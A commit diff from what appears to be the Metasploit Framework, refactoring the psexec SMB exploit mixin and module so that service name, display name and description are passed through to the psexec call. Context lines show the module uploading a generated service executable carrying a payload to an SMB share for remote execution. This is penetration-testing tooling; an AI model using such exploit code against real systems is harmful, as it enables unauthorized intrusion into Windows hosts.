rebase to use the mixin psexec

agix · agix · commit 1a3b31926285 · 2014-05-13T16:04:40.000+02:00
diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
@@ -72,7 +72,6 @@ def psexec(command, disconnect=true, service_description=nil, service_name=nil,
     end
     servicename = service_name || Rex::Text.rand_text_alpha(11)
     displayname = display_name || Rex::Text.rand_text_alpha(16)
-    servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)
 
     svc_handle = nil
     svc_status = nil
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
@@ -155,7 +155,7 @@ def exploit
       simple.disconnect("ADMIN$")
     else
       servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
-      servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
+      servicedescription = datastore['SERVICE_DESCRIPTION']
       displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
 
       # Upload the shellcode to a file
@@ -179,9 +179,6 @@ def exploit
       end
       exe = ''
       opts = { :servicename => servicename }
-      if (datastore['PAYLOAD'].include? 'x64')
-        opts.merge!({ :arch => ARCH_X64 })
-      end
       exe = generate_payload_exe_service(opts)
 
       fd << exe
@@ -205,7 +202,7 @@ def exploit
         file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
       end
 
-      psexec(file_location, false, servicedescription)
+      psexec(file_location, false, servicedescription, servicename, displayname)
 
       print_status("Deleting \\#{filename}...")
       sleep(1)
